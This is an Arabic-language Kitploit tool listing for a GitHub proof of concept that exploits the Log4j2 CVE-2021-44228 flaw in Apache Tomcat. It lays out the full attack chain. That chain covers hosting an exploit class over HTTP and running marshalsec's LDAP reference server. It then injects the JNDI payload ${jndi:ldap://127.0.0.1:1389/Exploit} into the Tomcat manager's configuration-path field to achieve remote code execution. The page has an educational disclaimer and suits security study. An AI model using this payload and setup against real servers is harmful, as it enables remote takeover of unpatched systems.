Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
apache-tomcat-log4j — إثبات المفهوم لثغرة Log4j2 CVE-2021-44228 في Apache Tomcat | Kitploit
أدوات/GitHubGitHub/many-fac3d-g0d/apache-tomcat-log4j
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmany-fac3d-g0d/apache-tomcat-log4j

apache-tomcat-log4j

إثبات المفهوم لثغرة Log4j2 CVE-2021-44228 في Apache Tomcat

عرض المستودع
51منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات الاختراق (POC) لثغرة Log4j2 CVE-2021-44228 في Apache Tomcat

معاينة

GIF

الإعداد

تشغيل خادم Tomcat

root@kitploit:~
git clone
cd apache-tomcat-10.0.14/bin
startup.bat

استضافة صنف الاستغلال

root@kitploit:~
cd exploit
py -m http.server 8888
root@kitploit:~
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

الهجوم

أدخل ${jndi:ldap://127.0.0.1:1389/Exploit} في الحقل 'XML Configuration file path' داخل تطبيق المدير http://localhost:8080/manager/html

يتم تحميل صنف الاستغلال ويتم تنفيذ RCE (سيتم فتح تطبيق الآلة الحاسبة)

إخلاء مسؤولية

هذا المستودع هو مجرد POC لأغراض تعليمية. مالك المستودع غير مسؤول عن أي أضرار تحدث. كملاحظة أخلاقية، لا تكن شريرًا.

المراجع

استغلال LDAP https://github.com/mbechler/marshalsec

تنزيل الأداة